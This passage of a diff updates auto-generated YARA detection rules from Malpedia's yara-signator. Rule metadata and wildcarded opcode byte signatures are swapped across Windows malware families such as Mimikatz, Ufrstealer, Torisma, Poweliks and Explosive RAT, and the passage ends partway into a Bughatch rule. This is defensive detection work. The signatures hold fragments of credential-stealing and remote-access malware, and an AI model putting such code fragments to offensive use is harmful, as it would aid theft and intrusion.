@@ -88665,34 +88690,34 @@ rule MALPEDIA_Win_Greetingghoul_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8945f4 33c9 894df8 380f 7409 }
-		$sequence_1 = { 57 660fd603 33ff c6430800 c70600000000 }
-		$sequence_2 = { ff15???????? 85c0 7e06 03f0 2bf8 75ea }
-		$sequence_3 = { 750c 6a21 e8???????? 83c404 eb0d 8d4721 }
-		$sequence_4 = { c3 0fbec8 0fbec3 8b5dfc 2bc8 74e1 }
-		$sequence_5 = { 75eb 8b5dfc 83c8ff 3b5df8 5f 0f44d8 5e }
-		$sequence_6 = { 7e06 03d8 2bf0 75ea }
-		$sequence_7 = { 33f6 8a17 80fa20 740a }
-		$sequence_8 = { e8???????? 83c404 eb10 8d4701 03c3 50 }
-		$sequence_9 = { 5d c3 5f c7462800000000 8bc3 5e 5b }
+		$sequence_0 = { 8b00 8b4dfc 668b00 668981a00b0000 8b4508 8b00 40 }
+		$sequence_1 = { e8???????? 59 50 ff7508 8b4da0 e8???????? 0fb6c0 }
+		$sequence_2 = { c3 8d88dfa9ffff 83f95d 7709 0fb704458ebf6b00 c3 8d90dfa8ffff }
+		$sequence_3 = { 8bcf e8???????? 8b38 85ff 7447 8b4f08 51 }
+		$sequence_4 = { 8b9654040000 68b3fe654f 51 6a64 6a02 68???????? 52 }
+		$sequence_5 = { 8bce e8???????? 8bf8 3bfb 0f840cffffff 8bce e8???????? }
+		$sequence_6 = { c3 bac8c50000 663bc2 720a b9f0c50000 663bc1 7610 }
+		$sequence_7 = { ff15???????? 8945fc 837dfc00 7c33 ff75f8 ff15???????? 8945fc }
+		$sequence_8 = { 8b85d4fdffff 8a00 8885cffdffff ff85d4fdffff 80bdcffdffff00 75e3 8b85d4fdffff }
+		$sequence_9 = { 8b5e08 eb12 8b4e08 8b4604 6a00 52 51 }
 
 	condition:
-		7 of them and filesize < 696320
+		7 of them and filesize < 7086080
 }
-rule MALPEDIA_Win_Crypt0L0Cker_Auto : FILE
+rule MALPEDIA_Win_Mimikatz_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "36a9a672-4992-57ea-891c-f29c4225a913"
+		id = "aca0d4e4-4192-5121-a9cd-9ca0e401c83a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crypt0l0cker_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mimikatz_auto.yar#L1-L209"
 		license_url = "N/A"
-		logic_hash = "b3cddc973c5366c89b799135e4693f1cb6d7cd129335c29ced490dcf89284e44"
+		logic_hash = "3624438eda15e47ae98de9ad5feae5e5f01b75b23634de1325ad601ffd44065d"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -88704,32 +88729,44 @@ rule MALPEDIA_Win_Crypt0L0Cker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bcb e8???????? eb05 bf03000000 56 6a01 682f5b5412 }
-		$sequence_1 = { 53 e8???????? 59 59 85c0 0f84bbfeffff 8b45f8 }
-		$sequence_2 = { 8bcf e8???????? 8b4c2418 e8???????? 85f6 740f 56 }
-		$sequence_3 = { 0f8e85000000 53 ff75fc 8d45a8 50 8bd0 8d4dbc }
-		$sequence_4 = { 33c1 894ee8 8946ec 8d042e c1f802 8b4c8314 8bc1 }
-		$sequence_5 = { 68???????? bac8cfa6d0 8bce e8???????? 83c404 85c0 0f85b2000000 }
-		$sequence_6 = { e8???????? 83c40c 68fd010000 53 85f6 7506 }
-		$sequence_7 = { 3bf2 7301 47 03d8 895de8 3bd8 }
-		$sequence_8 = { 8be5 5d c3 55 8bec 83ec18 8bc2 }
-		$sequence_9 = { 0f8520080000 c74424143c000000 55 8d4900 837e3400 0f8505080000 833e01 }
+		$sequence_0 = { 83f8ff 750e ff15???????? c7002a000000 }
+		$sequence_1 = { f7f1 85d2 7406 2bca }
+		$sequence_2 = { 3c02 7207 e8???????? eb10 }
+		$sequence_3 = { eb84 668b442430 eb1d 834608fe }
+		$sequence_4 = { 83f812 72f1 33c0 c3 }
+		$sequence_5 = { e8???????? 83c8ff e9???????? 8d0412 89442438 }
+		$sequence_6 = { ff15???????? 85c0 0f94c3 85db 7508 }
+		$sequence_7 = { 6683f83f 7607 32c0 e9???????? }
+		$sequence_8 = { c3 81f998000000 7410 81f996000000 7408 }
+		$sequence_9 = { 66894108 33c0 39410c 740b }
+		$sequence_10 = { ff15???????? bd6f000000 3bc3 7405 }
+		$sequence_11 = { e8???????? 8bf0 85c0 7433 8b542478 d1ea 7420 }
+		$sequence_12 = { ff15???????? 3bc7 0f84d4010000 8b542430 }
+		$sequence_13 = { 2bc1 85c9 7403 83c008 }
+		$sequence_14 = { 83fb04 7cdc 8b5df8 8ad3 02d2 8ac7 c0e804 }
+		$sequence_15 = { 83e001 51 894614 c7461ce0164000 c74620f0164000 c7462410174000 }
+		$sequence_16 = { 897e14 897e70 c686c800000043 c6864b01000043 c7466878d14600 6a0d }
+		$sequence_17 = { c745fc00000000 ff15???????? 50 e8???????? 8bd8 }
+		$sequence_18 = { 03c2 c1f802 57 50 33db 33f6 e8???????? }
+		$sequence_19 = { 6a00 50 e8???????? 83c40c c7450800000000 }
+		$sequence_20 = { 83f805 7d10 668b4c4310 66890c45b8e14600 40 }
+		$sequence_21 = { c705????????cf2f4000 8935???????? a3???????? ff15???????? a3???????? 83f8ff }
 
 	condition:
-		7 of them and filesize < 917504
+		7 of them and filesize < 1642496
 }
-rule MALPEDIA_Win_Sysget_Auto : FILE
+rule MALPEDIA_Win_Torisma_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d2f0576d-1441-54f4-9c7c-cf1f813e0f5e"
+		id = "c0490c82-c45a-54e7-aa2a-3188c569a1ea"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sysget_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.torisma_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "089522db1c40ede3965799cc3ef7759b59f64889024e8b66531171fe0f366f21"
+		logic_hash = "4aa02301b79ecba1924d78ea53a128f60820750cf7fd370e510af85a61be0b19"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88743,34 +88780,37 @@ rule MALPEDIA_Win_Sysget_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? bf???????? 83c424 c60000 }
-		$sequence_1 = { 668b08 83c002 6685c9 75f5 8dbdecf1ffff 2bc6 83ef02 }
-		$sequence_2 = { 8325????????00 5e c3 55 8bec 83ec34 a1???????? }
-		$sequence_3 = { 8985c4f9ffff 052c010000 50 e8???????? 83c40c 6800800000 }
-		$sequence_4 = { a3???????? 57 6a11 59 6a7c 8d4580 }
-		$sequence_5 = { 8d85fcf7ffff 50 e8???????? 59 33c0 }
-		$sequence_6 = { 8b85f8fbffff 8d8df4fbffff 51 50 8d85fcfbffff }
-		$sequence_7 = { 8b35???????? 57 6a10 58 50 6a01 }
-		$sequence_8 = { ff15???????? 8bc6 8bd6 668b08 83c002 663bcb }
-		$sequence_9 = { 8d853cffffff 50 ff35???????? ff15???????? a1???????? }
+		$sequence_0 = { e8???????? 3d83490000 7507 b883490000 }
+		$sequence_1 = { 7402 eb05 e9???????? b833280000 }
+		$sequence_2 = { e8???????? 3d514b0000 7504 33c0 }
+		$sequence_3 = { 8b3f c1ef02 83e701 c1e702 }
+		$sequence_4 = { 488b4c2440 e8???????? 488b442460 488b4018 48c70000000000 }
+		$sequence_5 = { 488b00 488b7820 33c0 b920000000 }
+		$sequence_6 = { 48894c2408 57 4883ec40 48c744242000000000 }
+		$sequence_7 = { ff2495c0d50010 8bc7 ba03000000 83e904 }
+		$sequence_8 = { 837c242000 7504 33c0 eb23 }
+		$sequence_9 = { 894dec 6a00 ff15???????? 8d55dc 52 }
+		$sequence_10 = { 51 8b5510 52 6a25 6a20 }
+		$sequence_11 = { 6a02 8b4da4 8b11 52 }
+		$sequence_12 = { c1e104 8b94242c010000 0bd1 8bca }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 322560
 }
-rule MALPEDIA_Win_Synccrypt_Auto : FILE
+rule MALPEDIA_Win_Minibus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f82ea40e-0da6-5f75-a1e0-92f3a1e696de"
+		id = "9a553746-bfda-50b5-bcb8-f78a742705c0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.synccrypt_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minibus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.minibus_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "b9e46808771b143f589c002978b4db13a073c8de6a5f0396d2ab6b76d653e5e9"
+		logic_hash = "633d35aef0c45891bfd2d9690e003786b5685be07a68c0378a6a4c37c3387340"
 		score = 75
-		quality = 45
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -88782,32 +88822,32 @@ rule MALPEDIA_Win_Synccrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8d43d0 6683f809 0f8654010000 8d439f 6683f805 0f8653010000 }
-		$sequence_1 = { c7465800000000 893c24 c744240440000000 e8???????? 8b06 8903 8b4604 }
-		$sequence_2 = { 891c24 c744240400000000 bb01000000 e8???????? c744240c32010000 c7442408???????? c74424041e000000 }
-		$sequence_3 = { c1fa02 29c2 8d0492 01c0 29c1 85d2 0fb68181e65800 }
-		$sequence_4 = { c7442408???????? c744240426000000 c704240a000000 e8???????? 833d????????ff 0f851cfeffff eb8d }
-		$sequence_5 = { c744240878000000 c74424048e000000 c7042426000000 e8???????? 83caff e9???????? c744245caab75900 }
-		$sequence_6 = { e8???????? 893424 89c3 e8???????? 29c3 7876 39fb }
-		$sequence_7 = { c7433c00000000 c7434000000000 891c24 ff5608 85c0 7411 83c424 }
-		$sequence_8 = { 896c2404 893c24 e8???????? 893c24 e8???????? 8b442424 83c43c }
-		$sequence_9 = { c7442404???????? 893424 e8???????? 85c0 0f8ff3feffff e9???????? c7442404???????? }
+		$sequence_0 = { 7cc3 eb25 85db 7421 83ceff 8bc6 }
+		$sequence_1 = { 0fb742fe 83f85c 7438 83f82f 7433 8b4de4 }
+		$sequence_2 = { 50 8d7720 e8???????? 8b9590fdffff 8b8584fdffff }
+		$sequence_3 = { e8???????? 8945f8 3bd8 0f841d010000 }
+		$sequence_4 = { 8d4701 3dffffff7f 0f87e8000000 03c0 3d00100000 722a }
+		$sequence_5 = { 83fa08 7202 8b3e 8d041b 50 ff75f8 }
+		$sequence_6 = { 33ff 33db 897de4 895de8 85f6 7421 }
+		$sequence_7 = { e8???????? 8b4de8 83c40c 83f908 7234 }
+		$sequence_8 = { 8bf1 8975b8 8975ac c745b000000000 c7461000000000 c7461400000000 c70600000000 }
+		$sequence_9 = { 8bd1 57 c70600000000 c74604ffff0000 8b4a1c 8bc1 }
 
 	condition:
-		7 of them and filesize < 4489216
+		7 of them and filesize < 324608
 }
-rule MALPEDIA_Win_Poweliks_Auto : FILE
+rule MALPEDIA_Win_Boldmove_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f451c0b0-4649-5c08-94b0-36c17c318bbf"
+		id = "3bdf90c7-36e1-5e06-8df9-776b6e88680a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poweliks_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boldmove"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.boldmove_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "67c4fd9796059c69286d2c247dc5cb104b6a720e1f7ef3b5b45dfcea3566e76a"
+		logic_hash = "3d258453779af88e427ea6662db58aa1b287b8846df27e0a7720298a0095c401"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88821,32 +88861,32 @@ rule MALPEDIA_Win_Poweliks_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3bce 7602 8bce 85c9 7415 8b7d08 8b720c }
-		$sequence_1 = { 394df4 72cd 8b703c 03f0 8b8e80000000 837c010c00 7449 }
-		$sequence_2 = { ff55f0 8b7508 8b9e40110000 81c604110000 6a40 6800300000 03de }
-		$sequence_3 = { 55 8bec 83ec68 6a6b 58 6a65 66894598 }
-		$sequence_4 = { 6a6b 58 6a65 66894598 58 }
-		$sequence_5 = { 51 ff15???????? 8945f8 8d45f8 50 ff15???????? 33d2 }
-		$sequence_6 = { 8b0c87 0fb70443 8b3486 8365fc00 03ca 894df4 }
-		$sequence_7 = { 58 6a72 6689459a 58 6a6e 6689459c 58 }
-		$sequence_8 = { 47 83ff0c 72ea 83ff0c }
-		$sequence_9 = { 8b5df4 03d8 8a4405d0 3a441dd0 }
+		$sequence_0 = { 8b4308 890424 ff15???????? 50 50 8b4308 890424 }
+		$sequence_1 = { 83e104 89442454 894c2418 0f852f0e0000 }
+		$sequence_2 = { 56 53 83ec20 e8???????? a1???????? dd5df0 83780c00 }
+		$sequence_3 = { d9ee 8b5c245c 8944245c 83c701 dbe9 897c2434 }
+		$sequence_4 = { 8b449908 85c0 7415 890424 e8???????? a1???????? c744980800000000 }
+		$sequence_5 = { c7042404000000 e8???????? c7434000000000 89433c e8???????? dd5b08 0fb617 }
+		$sequence_6 = { 8d85c8fbffff c744240c07000000 89442408 c744240400040000 893424 e8???????? 8b85c8fbffff }
+		$sequence_7 = { 66250045 663d0005 0f84f3040000 6681e2ff7f }
+		$sequence_8 = { 39f0 b800000000 0f47d0 8d440b04 01d9 89442404 89542408 }
+		$sequence_9 = { d905???????? d9c1 d8c1 d9cb dbf3 dddb 0f87a7030000 }
 
 	condition:
-		7 of them and filesize < 115712
+		7 of them and filesize < 242688
 }
-rule MALPEDIA_Win_Liteduke_Auto : FILE
+rule MALPEDIA_Win_Slothfulmedia_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce6d7cbd-e712-527e-8d2e-e59cc7813425"
+		id = "12866e57-5c22-5ece-ab6b-edebb824500e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.liteduke"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.liteduke_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slothfulmedia"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.slothfulmedia_auto.yar#L1-L175"
 		license_url = "N/A"
-		logic_hash = "e8630c4a732088757bd3da58bb3967f30c07f9d1aee8531a027e677d423a3358"
+		logic_hash = "8cdce0e96c9b360c003407b809360fea7e440aeaa30b884d65090695657af8b0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88860,32 +88900,38 @@ rule MALPEDIA_Win_Liteduke_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c9 c20400 55 89e5 ff7508 6800010000 }
-		$sequence_1 = { 51 6821020000 50 6a21 50 6888c00700 ffb5d0fdffff }
-		$sequence_2 = { ad 6a04 59 c1c008 3c3d 7501 45 }
-		$sequence_3 = { 837d1001 7510 c745f810000000 c745fc0a000000 eb2a 837d1002 7510 }
-		$sequence_4 = { f70600000080 7409 8b06 25ffffff3f eb60 50 e8???????? }
-		$sequence_5 = { 8a03 52 50 6a03 e8???????? 83c408 5a }
-		$sequence_6 = { 7404 0113 ebca 2113 ebc6 58 }
-		$sequence_7 = { 50 ff15???????? 83c410 ff75e4 e8???????? 6800800000 }
-		$sequence_8 = { e8???????? 31c0 aa 61 c9 c20c00 55 }
-		$sequence_9 = { 21df 89d0 21f0 09f8 01c1 034dec }
+		$sequence_0 = { 8365f000 837d1400 53 56 57 0f86a0000000 8b5d10 }
+		$sequence_1 = { 68df3d7a6b 50 e8???????? 57 ff15???????? 57 }
+		$sequence_2 = { d1f8 8b45fc 7505 b8???????? 50 57 }
+		$sequence_3 = { 397df4 0f8640ffffff 8b4508 e8???????? cc 55 8bec }
+		$sequence_4 = { 33c0 eb17 57 ff750c }
+		$sequence_5 = { ff7320 6a00 6a00 ffb33c020000 ff15???????? 8945f8 }
+		$sequence_6 = { ff7514 56 ff15???????? 56 ff15???????? 8b4508 eb02 }
+		$sequence_7 = { 1bd2 83daff 85d2 7422 83f805 761f }
+		$sequence_8 = { ff15???????? 8b8c2410020000 5f 5e 33cc }
+		$sequence_9 = { 6689442414 e8???????? 83c40c 6a00 ff15???????? 8b35???????? 8b3d???????? }
+		$sequence_10 = { 83c40c 6804010000 8d44240c 50 6a00 }
+		$sequence_11 = { 85c0 7507 ffd7 83f805 74ee 6804010000 }
+		$sequence_12 = { 8b35???????? 8b3d???????? 90 68???????? ffd6 85c0 }
+		$sequence_13 = { 8d4c2410 51 ff15???????? 8b8c2410020000 }
+		$sequence_14 = { e8???????? 81c40c020000 c21000 3b0d???????? 7502 }
+		$sequence_15 = { 6804010000 8d54240c 6a00 52 e8???????? 83c40c }
 
 	condition:
-		7 of them and filesize < 1171456
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Xtinyloader_Auto : FILE
+rule MALPEDIA_Win_Crenufs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "18e6856e-e403-5601-8fbf-f7925fca3610"
+		id = "487ba1c7-31dd-5f61-bb00-5c9d73db857b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xtinyloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xtinyloader_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.crenufs_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "b857d545e3495e8e215ff8dbc4483cf1ba89c02a05d887dc31b61d1a2d74f26a"
+		logic_hash = "b8d4f6abd83faf05e3956845ba58bcd09d9f7c4a785dc9758948905ec6301e11"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88899,32 +88945,32 @@ rule MALPEDIA_Win_Xtinyloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff35???????? e8???????? 8b35???????? 83c448 8944241c 85db 7409 }
-		$sequence_1 = { 7437 57 ff15???????? 85c0 7425 56 }
-		$sequence_2 = { e8???????? 50 ff35???????? e8???????? a3???????? 0fb605???????? 83c444 }
-		$sequence_3 = { ff45fc 8b45fc 3b45f4 72be 33c0 5f 5e }
-		$sequence_4 = { 8d45f8 50 8b450c 2bc7 }
-		$sequence_5 = { 85c0 7442 8b45fc 8b0c86 8b450c }
-		$sequence_6 = { 8b5d08 b84d5a0000 663903 7407 33c0 e9???????? }
-		$sequence_7 = { 57 ff15???????? 85c0 0f8450010000 8d45f8 }
-		$sequence_8 = { 57 895de4 895df4 895dec }
-		$sequence_9 = { 7459 393d???????? 7451 393d???????? }
+		$sequence_0 = { 6a01 8d4de4 ff15???????? 8b4df4 5f 5e 5b }
+		$sequence_1 = { 8b7610 c744241000000000 3930 770a }
+		$sequence_2 = { 50 56 8d4de0 ff15???????? 57 68???????? }
+		$sequence_3 = { 8bf9 56 897c2418 e8???????? 56 ff15???????? }
+		$sequence_4 = { c7461001000000 8bde ff15???????? 392d???????? 7512 8935???????? 892e }
+		$sequence_5 = { 52 8d7e58 6a04 57 50 ffd5 }
+		$sequence_6 = { 03ca 894c2438 3b4b18 740d 8b4c2454 c74118ccc74000 eb61 }
+		$sequence_7 = { ff15???????? 834dfcff 6a01 8d4ddc ff15???????? 8b4df4 8bc6 }
+		$sequence_8 = { 53 50 68???????? 53 ff15???????? 6a01 8d4db0 }
+		$sequence_9 = { ff15???????? e9???????? a1???????? bf???????? 83c9ff }
 
 	condition:
-		7 of them and filesize < 50176
+		7 of them and filesize < 106496
 }
-rule MALPEDIA_Win_Ufrstealer_Auto : FILE
+rule MALPEDIA_Win_Poslurp_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ba013c32-c7d7-5540-a7af-23c784527e98"
+		id = "de29f131-c10c-5b1a-9ede-2dfe5ee182bf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ufrstealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ufrstealer_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poslurp"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poslurp_auto.yar#L1-L115"
 		license_url = "N/A"
-		logic_hash = "5a74533151b417ab8386a9dc0bd4bcb97ff632563f715bef9c755e4394a3e888"
+		logic_hash = "dafce983a197626ced3ffe7ea55c9454b2349c0bd7691c948d5ed2bf42cf11d0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -88938,71 +88984,71 @@ rule MALPEDIA_Win_Ufrstealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8955f4 3b55f0 0f82ddfcffff 68???????? e8???????? 68???????? }
-		$sequence_1 = { 72f2 eb1e 8b75e8 46 }
-		$sequence_2 = { ff35???????? ff15???????? 8bd8 ff75fc ff7608 53 ff15???????? }
-		$sequence_3 = { 83c304 ebb2 c705????????66666666 6a04 68???????? e8???????? }
-		$sequence_4 = { 85c0 7548 803d????????00 7411 6a00 68???????? ff15???????? }
-		$sequence_5 = { 6800040000 ff7510 6aff ff7204 6a00 6a00 ff15???????? }
-		$sequence_6 = { 8945ec ff75f0 ff15???????? 50 6a06 ff75f0 }
-		$sequence_7 = { 6801000080 ff15???????? 85c0 0f85fc030000 68000000f0 6a01 6a00 }
-		$sequence_8 = { e8???????? 85c0 0f846c020000 83c00a }
-		$sequence_9 = { a1???????? 0305???????? c60000 68???????? ff35???????? e8???????? }
+		$sequence_0 = { 4883f8ff 743d 448d4f02 4533c0 33d2 488bc8 }
+		$sequence_1 = { 3905???????? 7309 33c9 ff15???????? }
+		$sequence_2 = { 44891d???????? eb0b 6689445420 41ffc0 48ffc2 4883c9ff 33c0 }
+		$sequence_3 = { 48f7d1 4883e901 7458 448b0d???????? }
+		$sequence_4 = { 4c8bf0 488bf8 33c0 f3aa 498bce 488bd5 }
+		$sequence_5 = { 740e 0f1f4000 488b1b 66837b3818 }
+		$sequence_6 = { ff15???????? 4883f830 0f85b3000000 817c245000100000 }
+		$sequence_7 = { 4d897b08 4d897bc8 8b7c0850 4c8bf2 488be9 4d897ba0 }
+		$sequence_8 = { 0f84d5000000 6666660f1f840000000000 0fb703 ffc9 83e830 }
+		$sequence_9 = { ffce 488bd5 48d1f9 8bfb 85c9 }
 
 	condition:
-		7 of them and filesize < 770048
+		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Badhatch_Auto : FILE
+rule MALPEDIA_Win_Explosive_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d1d3a6d7-0b13-5342-b91c-01db9308bc68"
+		id = "fcdedcfb-8d9a-5318-b6f5-1c975904e20d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badhatch_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.explosive_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.explosive_rat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "2f3c78bf8e633b7d8699c41a378230a8ee0e51bf5f6dea1277813531be01c065"
+		logic_hash = "41c4f7e33c52dbbd452e704e97d77f2addf0978f42a72a996b63009951e0b21e"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { ff15???????? 8b3d???????? 85c0 7512 ffd7 53 }
-		$sequence_1 = { 83c420 5f 5e 83c574 c9 c3 55 }
-		$sequence_2 = { 837df800 7435 837f0c00 742f 33c0 e9???????? 8b4f08 }
-		$sequence_3 = { 7cb9 eb09 ff15???????? 8945fc 8b45fc 5f 5e }
-		$sequence_4 = { 53 ff750c 8d443750 50 e8???????? 83c40c ff750c }
-		$sequence_5 = { ffd6 8d45e8 50 68???????? ff7508 e8???????? }
-		$sequence_6 = { 7559 ff15???????? 3dea000000 754c ff75fc 56 ff35???????? }
-		$sequence_7 = { 03d0 03d1 52 50 e8???????? 83c40c b8ea000000 }
-		$sequence_8 = { 838b40010000ff 33f6 56 56 6a01 56 }
-		$sequence_9 = { eb05 8b450c 8938 395dfc 740e 57 53 }
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 85c0 0f84fb000000 68???????? 68???????? ffd6 85c0 0f84e7000000 }
+		$sequence_1 = { 72cc 5d 8b442428 be10000000 3bc6 720d }
+		$sequence_2 = { 8d4514 50 8d4d0c e8???????? 84c0 8b7520 }
+		$sequence_3 = { 8902 8908 894104 5b c20400 894208 8908 }
+		$sequence_4 = { 89bdc4010000 89bdc8010000 6689bdd4010000 e8???????? 8bb508040000 83c41c }
+		$sequence_5 = { e8???????? 3bfb 745b 395d14 7539 6a34 e8???????? }
+		$sequence_6 = { 8d8d44ffffff e8???????? 8d8d04f5feff e8???????? 8b8558ffffff 8985f801ffff 89853402ffff }
+		$sequence_7 = { 3bfb 745b 395d14 7539 6a18 e8???????? 59 }
+		$sequence_8 = { 8d8d44ffffff e8???????? 8d8d7cffffff e8???????? 807d2475 0f8537010000 53 }
+		$sequence_9 = { 663bf2 771d 7220 41 41 40 40 }
 
 	condition:
-		7 of them and filesize < 156672
+		7 of them and filesize < 855040
 }
-rule MALPEDIA_Win_Marap_Auto : FILE
+rule MALPEDIA_Win_Bughatch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b10f821b-8ff2-589d-803b-f9a90d7546d1"
+		id = "f21da185-8629-53ca-b1ab-60be907f0853"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.marap"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.marap_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bughatch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bughatch_auto.yar#L1-L123"
 		license_url = "N/A"
